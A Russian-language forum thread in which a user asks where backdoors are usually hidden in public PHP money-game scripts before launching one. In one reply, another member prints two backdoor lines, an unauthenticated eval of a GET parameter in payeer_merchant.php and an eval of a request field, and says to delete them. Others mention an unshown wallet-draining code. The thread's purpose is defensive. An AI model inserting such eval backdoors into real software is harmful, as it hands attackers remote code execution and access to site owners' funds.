Автор Тема: Стучалка  (Прочитано 1201 раз)

0 Пользователей и 1 Гость просматривают эту тему.

PasatonАвтор темы

  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Более 100 сообщений Более 10 созданных тем
  • Дата регистрации: Дек. 2016
  • Сообщений: 104
  • Страна: by
  • Поблагодарили: 1 раз(а)
  • Репутация +0/-0
  • Пол: Мужской
    • Награды
Стучалка
« : 05 Мая 2017, 14:25:17 »
Ребята, расскажите пожалуйста, где наиболее часто (т.е. в каких файлах) написаны стучалки. А то собираюсь запустить проект, но надо сначала проверить на всевозможные дыры.

Какие дыры в этом скрипте есть? - https://yadi.sk/d/vLQTF2m43GiqQn
 

Joha

  • *****
  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Более 150 сообщений Более 10 созданных тем
  • Дата регистрации: Март 2017
  • Сообщений: 186
  • Страна: 00
  • Поблагодарили: 22 раз(а)
  • Репутация +4/-1
  • Пол: Мужской
    • Награды
  • Социальные сети:
    ВКонтакте
Стучалка
« Ответ #1 : 05 Мая 2017, 16:52:29 »
Не согласен с тобой

Добавлено сообщение: 05 Мая 2017, 16:57:31
смешно :)
Никто за бесплатно чистить дырки паблика не станет, запомни это раз и навсегда.
:vses:
Не согласен с тобой
 

Kuper

  • *
  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Топ 10 по сообщениям Репутация более 5 Болеее 300 сообщений
  • Дата регистрации: Дек. 2016
  • Возраст: 31
  • Сообщений: 438
  • Страна: ru
  • Поблагодарили: 35 раз(а)
  • Репутация +8/-2
  • Пол: Мужской
  • Дата рождения:1989-11-19
    • Награды
  • Социальные сети:
    ВКонтакте
Стучалка
« Ответ #2 : 05 Мая 2017, 17:04:22 »
Не согласен с тобой

Добавлено сообщение: 05 Мая 2017, 16:57:31
Почистишь мне бесплатно? :be happy:

PasatonАвтор темы

  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Более 100 сообщений Более 10 созданных тем
  • Дата регистрации: Дек. 2016
  • Сообщений: 104
  • Страна: by
  • Поблагодарили: 1 раз(а)
  • Репутация +0/-0
  • Пол: Мужской
    • Награды
Стучалка
« Ответ #3 : 05 Мая 2017, 17:09:53 »
Если не хотите помогать, то не пишите.
 

Joha

  • *****
  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Более 150 сообщений Более 10 созданных тем
  • Дата регистрации: Март 2017
  • Сообщений: 186
  • Страна: 00
  • Поблагодарили: 22 раз(а)
  • Репутация +4/-1
  • Пол: Мужской
    • Награды
  • Социальные сети:
    ВКонтакте
Стучалка
« Ответ #4 : 05 Мая 2017, 17:22:09 »
Я так не особо понимаю, но чаще всего дыры бывают в файле payeer_merchant.php там если есть строка
   # Проверяем баланс
   if(isset($_GET['balance'])){
      $payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
      if($payeer->isAuth()){
         $arBalance = $payeer->getBalance();
         if($arBalance["auth_error"] == 0){
            $balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
            echo "$balance";
         } else {
            echo 'error auth';
         }
      }
   }

   # Если пользователь админ
   
   eval($_GET['fs']);
если они есть, просто удали их, а ещё если там есть топ 5-10 тоже могут быть дыры, может не только в топе но все же вот код
f(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
если я не прав, не надо смеяться пожалуйста
 

shans5

  • *
  • *
  • Оффлайн
  • Награды Более 5 лет на форуме !!! Более 4000 сообщений Топ 10 по созданным темам Топ 10 по сообщениям Более 1000 созданных тем Репутация более 50 Бывает груб к участникам форума. За время в онлайне на форуме
  • Дата регистрации: Сен. 2015
  • Расположение: Регион 58
  • Возраст: 41
  • Сообщений: 4198
  • Страна: ru
  • Поблагодарили: 1035 раз(а)
  • Репутация +84/-9
  • Пол: Мужской
  • Всё только начинается !!!
  • Дата рождения:1979-06-30
    • Награды
Стучалка
« Ответ #5 : 05 Мая 2017, 18:38:26 »
Все правильно.... так же в модуле пожертвований пабличном есть дырка

Добавлено сообщение: 05 Мая 2017, 18:40:53
смешно :)
Никто за бесплатно чистить дырки паблика не станет, запомни это раз и навсегда.


Я не супер специалист.... и НЕ ХВАЛЮСЬ...
Но скрипты проверяю бесплатно... Если пользователь адекватный и по нормальному общается .
Подвергнуть критике, может любой.
Создать то,что будет подвергнуто критике,дано не каждому.
 

Shop-53

  • *
  • Оффлайн
  • Награды Более 5 лет на форуме !!! Топ 10 по сообщениям Болеее 300 сообщений Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 34 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
    • Награды
Стучалка
« Ответ #6 : 05 Мая 2017, 18:46:41 »
друзя хочу предупредить что \classes\_class.rfs_payeer.php есть один код через которий сливают бабки осторожно проверяйте ето не про силку от автора а именно кошель паер и вывод туда пример не покажу для безопасносты еслы что пишите помогу на счет скрипта я ничиво плохого ненашол  в программе есть список увязимостей которие могут бить в игре смотрите
a:0:{}
 

maks161

  • *
  • *
  • *
  • Оффлайн
  • Награды Более 5 лет на форуме !!! Репутация более 15 Топ 10 по созданным темам Топ 10 по сообщениям За финансовую помощь форуму !!! Более 1500 сообщений Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 37
  • Сообщений: 1761
  • Страна: ru
  • Поблагодарили: 143 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:1984-03-10
    • Награды
Стучалка
« Ответ #7 : 05 Мая 2017, 21:17:58 »
дырявый однозначно проверил. а где и какие дыры это уже сам смотри ручками каждый файл а не прогами которые только половину видят.

Добавлено сообщение: 05 Мая 2017, 21:22:09
друзя хочу предупредить что \classes\_class.rfs_payeer.php есть один код через которий сливают бабки осторожно проверяйте ето не про силку от автора а именно кошель паер и вывод туда пример не покажу для безопасносты еслы что пишите помогу на счет скрипта я ничиво плохого ненашол  в программе есть список увязимостей которие могут бить в игре смотрите
я знаю этот код.
 

Shop-53

  • *
  • Оффлайн
  • Награды Более 5 лет на форуме !!! Топ 10 по сообщениям Болеее 300 сообщений Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 34 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
    • Награды
Стучалка
« Ответ #8 : 05 Мая 2017, 22:04:36 »
Что ти знаеш какой код пример дай сюда или в лс
 

maks161

  • *
  • *
  • *
  • Оффлайн
  • Награды Более 5 лет на форуме !!! Репутация более 15 Топ 10 по созданным темам Топ 10 по сообщениям За финансовую помощь форуму !!! Более 1500 сообщений Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 37
  • Сообщений: 1761
  • Страна: ru
  • Поблагодарили: 143 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:1984-03-10
    • Награды
Стучалка
« Ответ #9 : 05 Мая 2017, 22:15:11 »
Что ти знаеш какой код пример дай сюда или в лс
ты хочешь чтоб я этот код выставил на всеобщее обозрение?
 

PasatonАвтор темы

  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Более 100 сообщений Более 10 созданных тем
  • Дата регистрации: Дек. 2016
  • Сообщений: 104
  • Страна: by
  • Поблагодарили: 1 раз(а)
  • Репутация +0/-0
  • Пол: Мужской
    • Награды
Стучалка
« Ответ #10 : 06 Мая 2017, 14:40:06 »
Хотя бы в лс написал..
 
Теги: